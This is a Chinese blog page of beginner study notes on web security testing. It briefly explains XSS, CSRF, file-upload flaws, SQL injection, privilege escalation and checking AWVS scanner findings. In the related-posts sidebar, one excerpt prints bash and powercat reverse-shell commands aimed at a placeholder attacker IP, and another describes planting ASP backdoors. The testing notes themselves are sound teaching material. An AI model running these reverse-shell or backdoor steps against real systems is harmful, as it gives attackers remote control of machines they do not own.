【安全测试】知识点梳理

已于 2024-09-10 08:46:20 修改
阅读量111 收藏
点赞数 3
分类专栏: 学习笔记 文章标签: 安全 web安全
于 2024-09-09 17:41:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86263843/article/details/142065006
版权

20240909

payload:用于测试是否有安全漏洞的小脚本

一、XSS漏洞

xss漏洞形成的原因是因为前端页面提交的恶意脚本传输到后端,后端不加过滤就直接返回到前端页面,造成信息泄露,这就是xss漏洞。

测试时,如果提交的payload脚本被浏览器执行了,那么就证明存在xss漏洞

分类

反射型xss漏洞:输入一个payload,返回一个弹窗

存储型xss漏洞:提交一个payload,存储到数据库,下次再访问该页面时,会弹出一个alter

dom型xss漏洞:在网页找一个标签,把标签里面的内容改成payload,然后回车,会弹出一个弹窗

二、CSRF漏洞

攻击者伪造请求连接,点了这个链接就会在不知情的情况下,借助用户的名义干坏事

测试时,如果没有二次确认验证,就说明存在csrf漏洞

三、文件上传漏洞

没有对文件的大小,文件的格式,文件的输入内容做判断过滤,导致木马文件也能被上传而产生的文件上传漏洞

四、sql注入漏洞

用requests请求去验证有没有返回sql语法错误,如果有返回,说明有sql注入漏洞

五、接口越权漏洞

用requests或者jmeter换一下url参数的值,如果换了参数后也能查到数据,说明有接口越权漏洞

六、安全测试——AWVS报告

AWVS----------自动网络漏洞扫描工具

通过检查sql注入攻击漏洞,xss跨站脚本攻击漏洞来审核web应用程序的安全性

报告里都是英文,里面有告诉你存在哪些漏洞,有高危的,中危的,低危的和提示的,然后会有这些漏洞的具体提示,awvs有时候会误报,所以需要验证这些漏洞是不是真的漏洞,所以需要人工根据提示进行验证,比如说:将可能存在漏洞的地方复制出来,比如说某个参数可能存在漏洞,我们就在这个参数的地方输入我们自己写的payload脚本,如果出现了弹窗,就说明这个地方确实存在漏洞。

是小李飞刀吖!
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
软件测试知识点梳理
quan062的博客
11-13 2916
目录 一、软件测试的定义 二、软件测试的分类 2.1 测试方法 2.1.1 黑盒测试 2.1.2 白盒测试 2.1.3 灰盒测试 2.2 测试阶段 2.2.1 单元测试 2.2.2 集成测试 2.2.3 系统测试 2.2.4 验收测试 2.3测试方向(属于系统测试阶段) 2.3.1 功能测试 2.3.2 性能测试 2.3.3 安全测试 2.3.4 UI界面测试 2.3.5 兼容性测试 2.3.6 易用性测试 2.3.7 稳定性测试 2.3.8 app专项测试 2.4
Empire知识点梳理
09-25
### Empire知识点梳理 #### 一、Empire框架简介 Empire是一个高级的.NET/C#后渗透框架,主要用于在成功攻破目标系统后进行更深层次的探索与操控。它提供了丰富的功能,包括但不限于创建监听器(Listeners)、管理和...
测试相关知识点梳理
蓝桉的博客
02-05 2083
软件测试的标准流程: 获取测试需求——编写测试计划——制定测试方案——设计测试用例——用例评审——执行测试——提交缺陷报告——测试分析与审批——提交测试报告 需求分析阶段 阅读需求、理解需求、分析需求点、参与需求审评会议 测试计划阶段 主要任务就是编写测试计划,参考软件需求规格说明书,项目总体计划,内容包括测试范围,进度安排,人力物力分配,整体测试策略的判定 编写测试用例 适当的了解设计,搭建测试用例框架,根据需求和设计编写测试用例 测试执行阶段 搭建环境准备数据,执行冒烟测
网络安全比赛知识点梳理小记
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
10-12 3694
目录 信息安全基础知识 Windows操作系统 Linux系统安全 网络应用安全 病毒分析 信息安全基础知识 1.1 信息安全基本知识 信息安全的定义 信息安全是指信息网络的硬件、软件及其系统中的数据受到保护,不受偶然的或者恶意的原因而遭到破坏、更改、泄露,系统连续可靠正常地运行,信息服务不中断。 信息安全的评估准则 可信计算系统评估准则(TCSEC),是全球公认的第一个计算机信息系统评估标准。 BS7799信息安全管理标准是英国制定的 安全威胁 信息窃取是指未经授权的攻击.
网络安全知识点梳理(期末不挂科)
ZTLJQ的博客
06-14 7427
可信计算机系统是指在计算机系统设计、实现和运行过程中,通过一系列安全措施确保系统的可靠性、保密性、完整性和可用性。创新内容:可信执行环境(TEE)详细解析:可信执行环境是一种硬件和软件相结合的安全技术,提供一个可信的执行环境,保护应用程序和数据不受恶意软件和攻击的影响。密码是一种将可读明文转换为不可读密文的算法或方法。密码的作用是确保信息的机密性、完整性和可用性,防止未经授权的访问和数据篡改。行列式是一个用于方阵的特殊函数,用于计算方阵的某种性质。
软件测试知识点梳理(一)
山鬼谣弋痕夕的博客
04-25 7532
软件测试 是为了发现错误而执行程序的过程。或者说,软件测试是根据软件开发各阶段的规格说明和程序的内部结构而精心设计一批测试用例(即输入数据及其预期的输出结果),并利用这些测试用例去运行程序,以发现程序错误的过程。测试要以查找错误为中心,而不是为了演示软件的正确功能,不是为了评估软件或改正错误。 软件测试主要工作内容是验证(verification)和确认(validation) 软件 测...
MySQL知识点梳理 万字超详解
weixin_59551524的博客
03-18 6682
文章目录MySQL数据库分类SQL分类数据库的基础操作常用数据类型表的操作MySQL表的增删查改(基础)增加操作查询(Retrieve)order by 排序别名去重 distinct条件查询 where分页查询修改update删除 deleteMySQL增删查改(进阶)null约束unique唯一约束DEFAULT:默认值约束PRIMARY KEY:主键约束FOREIGN KEY: 外键约束CHECK约束(了解)数据库表的设计一对一一对多多对多新增聚合查询聚合函数GROUP BY子句HAVING联合查询
测试基础知识点总结
LXMXHJ的博客
06-15 2178
测试知识点总结
AI大模型知识点梳理
2401_85328934的博客
06-27 1872
与其在AI抢占就业机会的危机中患得患失,不如快点接受这个新技术,将AI引入自己的工作中,通过AI来提升自己的生产力和创造力。AI大模型通过学习大量的图像数据和构建更深更复杂的神经网络,使计算机能够对图像进行更加准确的识别和分析。总的来说,“大模型”应该是基于具有超级大规模的、甚至可以称之为“超参数”的模型,需要大量的计算资源、更强的计算能力以及更优秀的算法优化方法进行训练和优化。大数据时代,越来越多的企业和机构需要处理海量数据,利用大模型技术可以更好地处理这些数据,提高数据分析和决策的准确性。
接口测试核心知识点梳理与解析
像蚂蚁一样工作,像蝴蝶一样生活
08-10 1003
在我们日常的测试工作中,接口测试其实很普遍,无论你是做什么测试,功能、自动化亦或是性能测试,都会或多或少接触到接口。最近也有许多人来询问我:什么是接口测试?怎样做接口测试? 下面帮大家一一梳理与解析: 主要内容: 1.什么是接口? 2.接口都有哪些类型? 3.接口的本质是什么? 4.什么是接口测试? 5.为什么要做接口测试? 6.怎样...
CISP 相关知识点梳理
热门推荐
喃喃不爱说话的博客空间
12-01 1万+
第一章 1.1 信息安全保障基础 v信息安全视角 §了解国家视角对信息安全关注点(网络战、关键基础设施保护、法律建设与标准化)相关概念; §了解企业视角对信息安全关注点(业务连续性管理、资产保护、合规性)相关概念; §了解个人视角对信息安全关注点(隐私保护、个人资产保护、社会工程学)相关概念; 信息安全的属性: 基本属性:CIA 保密性、完整性、可用性。 其他属性:真实性、可...
软件质量测试,思维导图,知识点汇总
06-28
用户可以下载xmind软件,打开提供的文件,以便更好地探索和理解软件质量测试的知识点。 通过这些详细的解释和思维导图的辅助,我们可以全面了解软件质量测试的各个方面,为实际工作中实施有效的测试策略打下坚实...
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1745
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 808
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 612
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 992
本文主要介绍网络安全认识与学习规划
内网安全:反弹shell
最新发布
8888的博客
09-10 896
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
WEB攻防-ASP安全&MDB下载植入&IIS短文件名&写权限&解析
2301_78384345的博客
09-08 469
可以通过扫描得到数据库文件路径,或者如果有网站源码,可以根据默认配置(目标服务器没有该配置的情况下)扫描到之后,用下面的工具(不支持win10)把木马文件put到服务器,上传后修改文件名为可解析文件。通过留言写入后门,在通过菜刀访问.asp时,就会执行后门。ASP-中间件-IIS短文件名探针-安全漏洞。ASP-中间件-IIS文件上传解析-安全漏洞。ASP-中间件-IIS配置目录读写-安全配置。ASP-数据库-ASP后门植入连接。2、ASP-数据库下载&植入;ASP-数据库-MDB默认下载。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值